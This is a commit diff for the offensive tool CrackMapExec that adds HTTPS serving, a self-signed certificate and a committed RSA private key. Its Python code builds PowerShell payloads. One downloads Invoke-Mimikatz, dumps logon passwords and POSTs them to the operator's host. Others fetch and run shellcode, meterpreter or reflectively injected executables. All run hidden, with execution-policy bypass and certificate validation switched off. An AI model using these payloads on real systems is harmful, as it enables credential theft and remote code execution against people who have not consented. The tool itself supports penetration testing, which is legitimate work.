Added HTTPS support as per #15

main
byt3bl33d3r 2015-10-16 15:25:35 -06:00
parent 8054b5e655
commit 7d2ba3c63a
4 changed files with 101 additions and 30 deletions

18
certs/crackmapexec.crt Normal file
View File

@ -0,0 +1,18 @@
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIJAJoXi7tJgXIQMA0GCSqGSIb3DQEBCwUAMAAwHhcNMTUx
MDE2MTkwMTE0WhcNMjUxMDEzMTkwMTE0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABo1AwTjAdBgNVHQ4EFgQU
Q7giuO8Hlv/pMqGMLASC8/uW82owHwYDVR0jBBgwFoAUQ7giuO8Hlv/pMqGMLASC
8/uW82owDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAGYf7iROqTpkG
Rl7O7Kf1gwb4LJcsSLSHKqOw76ujOVY4r552ayJLEGhkizXMgE4HuLTAdLFNd+KT
DyqxCK3GOikx0D/Wl+xgwQWxkNmuOlajDH1aNJp38BS9yFuHm5b8iOWLpgpoHfPU
9Lj16C3mnXRnKkmXxtg46gB3P1lT1Zv5Nl7o58//D/5/RCoRjZ4m/rfypekszsBZ
LzWwabf6WKWzwnx9S+tL/pelzMnhjJ83SmpRE0aKGjjw9+COzpnTyDdGSzCXLJM9
hjuDcReX7yk0o0thkwlu2pY2hA0ZwjAKu0fIZAD9s4QwxqfAnj26ENscd4VJA+Ph
4lJiTamdpA==
-----END CERTIFICATE-----

27
certs/crackmapexec.key Normal file
View File

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABAoIBAFtHPVPpNZqr0Z/P
GHj7gLfgzGNVOUXumWwk5jDVpkFke0GowK7FYr0Fa2VPIwXuQCPxNsTgiUT5KVzd
Q0fywp+fNldf6D05fzqyhB9X13FNFRgh3dfnWWW9CF4zVNlNrjbscVOxtHbNLTr3
A6Dv/F8CyRNkLH6jaaeyy+E4T+yUdnZNUNumhXLRGMWUUOWbTlNtoMAoWcF7cPZh
srBPwaGsH6ePNTzLC4Nve1Zayz8OUtLMcMJk8A85LadImYiYrY3F/2Kvx9IgO9dn
LPJgFrejI5Wa5AWk9O4d32gduXFW8EkJfKwAXLRqIB1HT7lXESVQiVz6HBde5fNp
YxwzhEECgYEA4AQSIEnge88MUG3vWSFl5iMR93wK2EiLbQi5W6TbNJzVh62eiFnW
U9JzGi329FHhlH8A2T8jhShwyaOjG43Vfii+HSofYaxlf2TcEa6FqKvz8GOfgHbN
QdD+6JEYg5hVELsLI0ML4CMul5/86Wc4pComonFFoiKFSv0443aCJDkCgYEAycDS
NDi0ywSbJ/eeTPhiAAtHY4CjgHH15Ba9AFAHOkOHBPMH8l66WjgoVhAH85yBhybr
3e+I+RCBILHyI/N20XWZo9bPiX6C2w4ukEKt8gB8DwFZDkssgHtMtv3Q3P1CBH51
kwH6MURp0KZ3JYMNTjM9/crYNmk/9SzQSKiDKeMCgYAPjljP4zFyh4s8XpX7Y4VW
+OJ7hCKgqFD+TlfI1GbgfW+aj2Tt5QcsJPYXQE/g4Xq/vB4L+AV4brl+Vx2xgSTt
MNka31z0hGs78H4TwEHJ178F13UxD47rXh8FeWXxZXeqxMJePX6qnubSYqrGboOR
atfp+eGzA6Cr92+m5AjfiQKBgHAi1jLkWciFdN+QB9JsM7wmiLVLaJUZwjvWT5J+
6KV/puofUolqEVXX5MOBAYprsKq3/V1Lp+wXOk472YQV7DKblJu154BaaszqYwMX
rKrXjhyg+Siyq7d10Lvc81wA/9KTnzHoZXFAvzeTbqHQ53JRlOEc/3OuqDfTgqj/
0HdVAoGBAKOhnY43mUvJWkBI/HmWK3a4/nm4o90HHmcYZzdFMSPAyYqpRSfMS/9S
+XjbO0ZetdEo+PV7ko5fT8ncw20Jdv8VMA8FMSpQs13AuI3tjv+mABqmXsm0wGYc
7f/09XL6y42MDF81N2ujSYT4QGJW2t1ipkgOmCQQrjIJdEtOoySF
-----END RSA PRIVATE KEY-----

3
certs/gen-self-signed-cert.sh Executable file
View File

@ -0,0 +1,3 @@
#!/bin/bash
openssl genrsa -out crackmapexec.key 2048
openssl req -new -x509 -days 3650 -key crackmapexec.key -out crackmapexec.crt -subj "/"

View File

@ -38,6 +38,7 @@ import csv
import re import re
import ntpath import ntpath
import socket import socket
import ssl
import hashlib import hashlib
import codecs import codecs
import BaseHTTPServer import BaseHTTPServer
@ -2686,22 +2687,9 @@ def enum_shares(smb):
return permissions return permissions
def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurlsa::logonpasswords exit'): def ps_command(command):
if args.ssl:
if katz_ip: command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + command
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command "{katz_command}";
$request = [System.Net.WebRequest]::Create('http://{addr}');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
""".format(addr=katz_ip, katz_command=katz_command)
if args.force_ps32: if args.force_ps32:
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE'))) command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
@ -2712,12 +2700,37 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
return ps_command return ps_command
def gen_mimikatz_command(localip, katz_command='privilege::debug sekurlsa::logonpasswords exit'):
protocol = 'http'
if args.ssl:
protocol = 'https'
command = """
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command "{katz_command}";
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
""".format(protocol=protocol, addr=localip, katz_command=katz_command)
return ps_command(command)
def inject_pscommand(localip): def inject_pscommand(localip):
protocol = 'http'
if args.ssl:
protocol = 'https'
if args.inject.startswith('met_'): if args.inject.startswith('met_'):
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1'); IEX (New-Object Net.WebClient).DownloadString('{}://{}/Invoke-Shellcode.ps1');
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip, Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(protocol,
localip,
args.inject[4:], args.inject[4:],
args.met_options[0], args.met_options[0],
args.met_options[1]) args.met_options[1])
@ -2728,10 +2741,12 @@ def inject_pscommand(localip):
elif args.inject == 'shellcode': elif args.inject == 'shellcode':
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1'); IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
$WebClient = New-Object System.Net.WebClient; $WebClient = New-Object System.Net.WebClient;
[Byte[]]$bytes = $WebClient.DownloadData('http://{addr}/{shellcode}'); [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
Invoke-Shellcode -Force -Shellcode $bytes""".format(addr=localip, shellcode=args.path.split('/')[-1]) Invoke-Shellcode -Force -Shellcode $bytes""".format(protocol=protocol,
addr=localip,
shellcode=args.path.split('/')[-1])
if args.procid: if args.procid:
command += " -ProcessID {}".format(args.procid) command += " -ProcessID {}".format(args.procid)
@ -2740,8 +2755,10 @@ def inject_pscommand(localip):
elif args.inject == 'exe' or args.inject == 'dll': elif args.inject == 'exe' or args.inject == 'dll':
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-ReflectivePEInjection.ps1'); IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
Invoke-ReflectivePEInjection -PEUrl http://{addr}/{pefile}""".format(addr=localip, pefile=args.path.split('/')[-1]) Invoke-ReflectivePEInjection -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=protocol,
addr=localip,
pefile=args.path.split('/')[-1])
if args.procid: if args.procid:
command += " -ProcID {}" command += " -ProcID {}"
@ -2924,14 +2941,14 @@ def connect(host):
if args.mimikatz: if args.mimikatz:
noOutput = True noOutput = True
args.command = ps_command(katz_ip=local_ip) args.command = gen_mimikatz_command(local_ip)
if args.mimi_cmd: if args.mimi_cmd:
noOutput = True noOutput = True
args.command = ps_command(katz_ip=local_ip, katz_command=args.mimi_cmd) args.command = gen_mimikatz_command(local_ip, args.mimi_cmd)
if args.pscommand: if args.pscommand:
args.command = ps_command(command=args.pscommand) args.command = ps_command(args.pscommand)
if args.inject: if args.inject:
noOutput = True noOutput = True
@ -3029,6 +3046,7 @@ if __name__ == '__main__':
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)') parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)')
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)") parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)") parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
parser.add_argument("--https", dest='ssl', action='store_true', help='Serve everything over https instead of http')
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output") parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets") parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
@ -3153,18 +3171,23 @@ if __name__ == '__main__':
print_error('Unable to find combo file at specified path') print_error('Unable to find combo file at specified path')
sys.exit(1) sys.exit(1)
if args.mimikatz or args.mimi_cmd or args.inject or (args.ntds == 'ninja'): if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
print_status("Press CTRL-C at any time to exit") print_status("Press CTRL-C at any time to exit")
print_status('Note: This might take some time on large networks! Go grab a redbull!\n') print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer) if args.ssl:
t = Thread(name='HTTPServer', target=server.serve_forever) httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
else:
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
t = Thread(name='HTTPServer', target=httpd.serve_forever)
t.setDaemon(True) t.setDaemon(True)
t.start() t.start()
concurrency(hosts) concurrency(hosts)
if args.mimikatz or args.inject or args.ntds == 'ninja': if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
try: try:
while True: while True:
sleep(1) sleep(1)